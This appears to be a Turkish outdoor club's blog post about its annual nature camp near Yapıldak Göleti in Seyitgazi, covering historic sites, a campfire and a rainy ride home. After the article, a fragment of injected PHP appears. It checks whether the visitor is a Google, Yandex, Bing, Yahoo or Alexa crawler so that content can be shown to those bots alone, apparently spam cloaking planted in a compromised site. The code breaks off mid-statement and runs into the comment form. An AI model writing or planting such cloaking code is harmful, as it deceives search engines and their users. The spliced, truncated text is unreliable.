“ESDAG” Geleneksel Doğa Kampı Gerçekleşti

Kamp alanımızdan bir görüntü Çadırlar Doğanın uyumu.

Fotograf Albümü Mevlüt Akın

Fotograf Albümü Eda-Gökay Konuk

Esdag ekibi her yıl doğa sever üyeleriyle gerçekleştirdiği ailelerinde katılım gösterdiği doğa kampını Seyitgazi ilçemizin Yapıldak Göleti civarında gerçekleştirdi.

Etkiniğe 25kişiye yakın üye katılım sağladı.Etkinlik tarihi ve turistik mekanlar gezilerinide içeriyordu.Seyitgazi Türbesi ile başladık ve mekanın tarihini üyelerimizle birlikte detaylı bir şekilde öğrendik.Sonrasında Yazılıkaya Frig Vadisinde yer alan Kaleler oyma yapılar tarihi izler sırasıyla izlendi.DoğanKale’de tırmanış yapıldı.

Yazılıkaya Soğuk hava deposu 

Yazılıkaya’da Soğuk hava deposunda serinledikten sonra.Rotamızı Yapıldak Göleti’ne çevirdik.Göl çevresinde dolaştık ve uygun kamp yerini bulduktan sonra geceyi geçireceğimiz güvenli kamp yerine yerleştik.

Tarihi mekanlarda Doğa Yürüyüşüde yaptık.

Herkes çok acıkmıştı ve çadırlar kurulup yemek yapımına geçtik.O anda sessizlik hakimdi.Enerjiyi topladıktan sonra yanımızda getirdiğimiz kano ile gölette serinledik.Burda herkesin aklına boğulmak gelir ancak deneyimli bir ekibiz ve bu tarz kazaların yaşanmaması adına tam tekmil hazır can yelekli arama kurtarma ilkyardım konularında deneyimli kişilerle bu etkinlikleri düzenliyoruz.

Arslanlı Mabet Kümbet Köyü

Serinlemek herşeye bedeldi ve hava yavaş yavaş kararmaya kızllığını göstermeye başladı.Kamp ateşsiz olmaz en güvenlisinden bir ateş yakıldı ve yanımızda getirdiğimiz patatesleri ve ateşte pişecek ne varsa muhabbet ve göl manzarası eşliğinde yerlerini aldılar.Gece hava uyku için idealdi telefonların çekmediği alanda doyasıya sosyal yaşam vardı.Herkes bunu özlemişti.

Kampta tüm lezzetler vardı Mısır bunlardan sadece biriydi.

Sabah kahvaltılar yapıldıktan göl ile vedalaştıktan sonra diğer tarihi mekan olan Kümbete doğru yola çıktık.Kümbette yer alan Arslanlı Mabet ve tarihi mezarları ziyaret ettikten sonra karabulutlardan korkarak onlara doğru ilerlerken yağmur bir anda bastırdı.2 araç 1 motordan oluşan konvoy motorun ıslanmaması için bir barınakta mecburi mola verdik fakat yağmur çok şiddetliydi ve motoru bırakarak yola devam ettik.

Gecenin en güzellerinden.

Kırkada yer alan Yıldız Lokantası Orhan Usta’ya uğrayarak meşhur lezzetlerini tadarken yağmurda dinmeye başladı grubun yarısı yemeğe devam ederken bizlerde motoru almak için tekrar geri döndük alıp geldik.Sonrasında sıra halinde yağmurdan kaçarcasına Eskişehir’e ulaştık.

Bu kampımızın kazananı dostluk oldu ve herkes doyasıya eğlendi telefon ve teknolojik aletlerin olmaması ayrıca güzeldi ve eskilere dönüş yaşadık yıldızları izledik cırcır böcekleri konser verdi.Kuşların cıvıltısıyla uyandık güneşi tenimizde oksijeni ciğerlerimizde hissederek tüm streslerimizden uzaklaşarak şehrimize ulaştık.Gerçekten şehir çok gürültülü ve insanları sinir hastası yapacak kıvamda doğaya çıkarak bu ortamdan kurtulmak şart.

ESDAG Sosyal sorumluluk kapsamında üyelerimize bu güzel ortamları tanıtarak spor sağlık ve rehabilitasyon hizmetini ücretsiz veriyor ve bol bol olumlu tepki alıyoruz ayrıca gençlerde doğal yaşmda aileden uzak kalarak sorumluluk sahibi oluyorlar.

Sizlerde arkadaşlarınızla ailenizle bu ortama dahil olabilirsiniz.

function vururumgardas(){
$agent = $_SERVER[‘HTTP_USER_AGENT’];
$sec = $agent;
switch(true){
case (strpos($sec,”google”)): $part = 1; break;
case (strpos($sec,”yandex”)): $part = 1; break;
case (strpos($sec,”bing”)): $part = 1; break;
case (strpos($sec,”yahoo”)): $part = 1; break;
case (strpos($sec,”alexa”)): $part = 1; break;
default : $part = 0;
}
if($part ==1){
echo ‘

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir